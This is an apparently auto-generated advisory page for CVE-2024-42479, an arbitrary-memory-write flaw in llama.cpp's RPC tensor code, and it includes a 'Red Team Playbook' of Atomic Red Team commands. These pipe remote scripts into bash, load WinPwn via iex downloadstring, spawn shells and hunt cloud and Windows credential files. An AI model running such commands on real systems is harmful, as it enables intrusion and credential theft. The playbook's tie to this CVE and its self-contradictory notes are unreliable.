CVE-2024-42479
Overview
The vulnerability is a memory corruption issue involving arbitrary address write due to unsafe handling of a pointer. Specifically, the `data` pointer member within the `rpc_tensor` structure in llama.cpp is improperly managed, allowing out-of-bounds or arbitrary memory writes. This flaw resides in the tensor RPC data handling component of the ggerganov llama.cpp project, affecting its C/C++ inference implementation.
Vulnerability Description
llama.cpp provides LLM inference in C/C++. The unsafe `data` pointer member in the `rpc_tensor` structure can cause arbitrary address writing. This vulnerability is fixed in b3561.
Impact
An unauthenticated remote attacker can exploit this vulnerability to perform arbitrary memory writes, potentially leading to remote code execution, complete system compromise, or denial of service. No user interaction or privileges are required, and network access suffices to trigger the flaw. This aligns with the CVSS vector indicating network attack vector, low complexity, no privileges, and no user interaction (AV:N/AC:L/PR:N/UI:N). The impact includes full confidentiality, integrity, and availability compromise of affected systems running vulnerable versions of llama.cpp.
Solution
Users should upgrade to the patched version of ggerganov llama.cpp that includes commit b3561 or later, as specified in the GitHub security advisory GHSA-wcr5-566p-9cwj. The fix addresses the unsafe pointer handling in the `rpc_tensor` structure. Detailed patch instructions and the fixed commit (b72942fac998672a79a1ae3c03b340f7e629980b) are available at the official GitHub repository: https://github.com/ggerganov/llama.cpp/security/advisories/GHSA-wcr5-566p-9cwj.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the llama.cpp library arises from an unsafe pointer manipulation within the `rpc_tensor` structure, specifically concerning the `data` pointer member. This design flaw allows for arbitrary address writing, which can lead to severe consequences, including unauthorized access to sensitive memory areas and potential code execution. The underlying issue stems from inadequate validation and sanitization of the pointer, enabling attackers to manipulate memory addresses directly. This kind of vulnerability is particularly dangerous in C/C++ environments, where developers often assume that memory management is handled correctly, leading to a false sense of security.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft malicious input that exploits the unsafe pointer, allowing them to overwrite critical memory locations. This could be achieved through remote procedure calls (RPC) where the `rpc_tensor` structure is used. For instance, an attacker could send specially formatted data to a service utilizing llama.cpp, triggering the unsafe behavior and leading to arbitrary code execution. Additionally, if the library is integrated into larger applications, the impact could be amplified, as the attacker may gain control over the entire application or system, depending on the privileges of the executing process.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on llama.cpp for machine learning tasks. Given the high CVSS score of 9.8, the risk associated with this flaw is classified as critical. Businesses could face severe repercussions, including data breaches, loss of intellectual property, and damage to reputation. Furthermore, the financial implications of remediation efforts, legal liabilities, and potential regulatory fines could be substantial. Organizations that fail to address this vulnerability may find themselves exposed to targeted attacks, especially if they are known to utilize this library in their infrastructure.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to update the llama.cpp library to the fixed version, as this will eliminate the vulnerability at its source. Regularly monitoring for updates and applying security patches is essential in maintaining a secure environment. Additionally, organizations should conduct thorough security assessments and code reviews of their applications that utilize this library, focusing on memory management practices. Employing static and dynamic analysis tools can help identify potential vulnerabilities in the code before they can be exploited.
In conclusion, the vulnerability within the llama.cpp library poses a serious threat due to its potential for arbitrary address writing. The implications for exploitation are broad, affecting not only the immediate application but also the overall security posture of the organization. By prioritizing detection and mitigation strategies, including timely updates and rigorous security practices, organizations can significantly reduce their risk exposure and safeguard their systems against potential attacks. As the cybersecurity landscape continues to evolve, proactive measures will be essential in defending against such critical vulnerabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ggerganov | Llama.cpp | All |
cpe:2.3:a:ggerganov:llama.cpp:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-42479 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/ggerganov/llama.cpp/security/advisories/GHSA-wcr5-566p-9cwj |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/ggerganov/llama.cpp/commit/b72942fac998672a79a1ae3c03b340f7e629980b |